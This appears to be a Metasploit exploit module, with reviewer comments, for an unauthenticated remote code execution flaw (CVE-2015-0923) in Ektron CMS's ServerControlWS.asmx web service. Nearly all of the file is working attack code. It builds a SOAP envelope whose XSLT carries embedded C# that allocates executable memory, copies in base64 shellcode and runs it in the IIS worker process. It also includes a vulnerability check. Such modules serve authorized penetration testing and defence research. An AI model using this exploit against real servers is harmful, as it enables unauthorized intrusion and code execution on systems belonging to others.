##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
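class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',
        'Description' => %q{
          Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have
          vulnerabilities in various operations within the ServerControlWS.asmx
          web services. These vulnerabilities allow for RCE without authentication and
          execute in the context of IIS on the remote system.
        },
        'Author' => [
          'catatonicprime'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2015-0923' ],
          [ 'US-CERT-VU', '377644' ],
          [ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]
        ],
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Privileged' => true,
        'Targets' => [
          ['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X64, ARCH_X86 ] }]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-02-05',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # NOTE(review): HTTP_DELAY is registered but never read anywhere in this
        # module, and its description refers to a "VBS payload request" this
        # module does not make. It is kept only so existing resource scripts
        # that set it keep working; it has no effect.
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),
        OptEnum.new('TARGETOP',
                    [
                      true,
                      'The vulnerable web service operation to exploit',
                      'ContentBlockEx',
                      %w[
                        ContentBlockEx
                        GetBookmarkString
                        GetContentFlaggingString
                        GetContentRatingString
                        GetMessagingString
                      ]
                    ])
      ]
    )
  end

  # Name of the SOAP child element that carries the attacker-supplied
  # stylesheet. ContentBlockEx spells it "Xslt"; every other supported
  # operation spells it "xslt".
  def vulnerable_param
    target_operation == 'ContentBlockEx' ? 'Xslt' : 'xslt'
  end

  # Additional child elements the selected operation needs ahead of the
  # stylesheet parameter. ContentBlockEx needs none; the others take an
  # (empty) <showmode/> element.
  def required_params
    target_operation == 'ContentBlockEx' ? '' : '<showmode/>'
  end

  # The web-service operation selected through TARGETOP.
  def target_operation
    datastore['TARGETOP']
  end

  # First half of the SOAP envelope: opens the selected operation, the XSLT
  # parameter and a CDATA-wrapped stylesheet whose msxsl:script element is
  # left open so the caller can append C# source.
  def prologue
    <<~XSLT
      <?xml version="1.0" encoding="utf-8"?>
      <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
      <#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">
      #{required_params}
      <#{vulnerable_param}>
      <![CDATA[
      <xsl:transform version="2.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="http://mycompany.com/mynamespace">
      <msxsl:script language="C#" implements-prefix="user">
    XSLT
  end

  # Second half of the envelope: closes the script block, adds a root
  # template that evaluates user:xml() (the C# method supplied between
  # prologue and epilogue) and closes every element prologue opened.
  def epilogue
    <<~XSLT
      </msxsl:script>
      <xsl:template match="/">
      <xsl:value-of select="user:xml()"/>
      </xsl:template>
      </xsl:transform>
      ]]>
      </#{vulnerable_param}>
      </#{target_operation}>
      </soap:Body>
      </soap:Envelope>
    XSLT
  end

  # Sends a benign stylesheet whose embedded C# merely returns a random
  # marker. Getting that marker back proves the service compiled and ran
  # attacker-controlled script, which is the vulnerability itself.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is echoed back,
  #   Unknown when no HTTP response was received at all, Safe otherwise.
  def check
    fingerprint = rand_text_alpha(5 + rand(5))
    xslt_data = <<~XSLT
      #{prologue}
      public string xml() {
      return "#{fingerprint}";
      }
      #{epilogue}
    XSLT

    res = send_xslt(xslt_data)
    # No response at all says nothing about the target; don't report Safe.
    return Exploit::CheckCode::Unknown if res.nil?
    return Exploit::CheckCode::Vulnerable if transform_succeeded?(res, fingerprint)

    Exploit::CheckCode::Safe
  end

  # TARGETURI's path with a trailing "/" appended when missing, so that a
  # relative path can be concatenated directly. Does not mutate the string
  # returned by target_uri.
  def uri_path
    path = target_uri.path
    path.end_with?('/') ? path : "#{path}/"
  end

  # Referer header pointing at the CMS root on the target, using https when
  # the SSL option is set and http otherwise.
  def build_referer
    scheme = datastore['SSL'] ? 'https://' : 'http://'
    "#{scheme}#{rhost}:#{rport}#{uri_path}"
  end

  # Builds a stylesheet whose C# allocates RWX memory in the IIS worker,
  # copies the base64-encoded payload into it and starts it on a new thread,
  # then returns a random marker so success can be recognised in the reply.
  #
  # NOTE(review): the P/Invoke signatures below declare VirtualAlloc's return
  # value and CreateThread's start address as UInt32. On a 64-bit worker
  # process a pointer above 4 GiB would be truncated before Marshal.Copy and
  # CreateThread use it. ARCH_X64 is listed as a supported target arch, so
  # confirm this on 64-bit w3wp.exe or move those declarations to IntPtr.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the service does not
  #   answer or the reply does not contain the marker.
  def exploit
    print_status('Generating the EXE Payload and the XSLT...')
    fingerprint = rand_text_alpha(5 + rand(5))

    xslt_data = <<~XSLT
      #{prologue}
      private static UInt32 MEM_COMMIT = 0x1000;
      private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

      [System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]
      private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

      [System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]
      private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

      public string xml()
      {
      string shellcode64 = @&quot;#{Rex::Text.encode_base64(payload.encoded)}&quot;;
      byte[] shellcode = System.Convert.FromBase64String(shellcode64);
      UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
      IntPtr hThread = IntPtr.Zero;
      IntPtr pinfo = IntPtr.Zero;
      UInt32 threadId = 0;
      hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
      return &quot;#{fingerprint}&quot;;
      }
      #{epilogue}
    XSLT

    print_status('Trying to run the xslt transformation...')
    res = send_xslt(xslt_data)
    fail_with(Failure::Unreachable, 'No response from the ServerControlWS.asmx web service') if res.nil?
    unless transform_succeeded?(res, fingerprint)
      fail_with(Failure::Unknown, 'There was an unexpected response to the xslt transformation request')
    end

    print_good('Exploitation was successful')
  end

  # POSTs a SOAP envelope to ServerControlWS.asmx under TARGETURI.
  #
  # @param xslt_data [String] the complete SOAP body to send
  # @return [Rex::Proto::Http::Response, nil] the response, or nil when none
  #   was received (connection failure or timeout)
  def send_xslt(xslt_data)
    send_request_cgi(
      'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",
      'version' => '1.1',
      'method' => 'POST',
      'ctype' => 'text/xml; charset=UTF-8',
      'headers' => {
        'Referer' => build_referer
      },
      'data' => xslt_data
    )
  end

  # True when the reply indicates our stylesheet was executed: HTTP 200, the
  # random marker present and no "Error" text in the body.
  #
  # NOTE(review): the /Error/ test is a coarse heuristic inherited from the
  # original logic; any unrelated occurrence of the word "Error" in the page
  # will make a successful transform look like a failure.
  def transform_succeeded?(res, fingerprint)
    body = res.body.to_s
    res.code == 200 && body.include?(fingerprint) && body !~ /Error/
  end
end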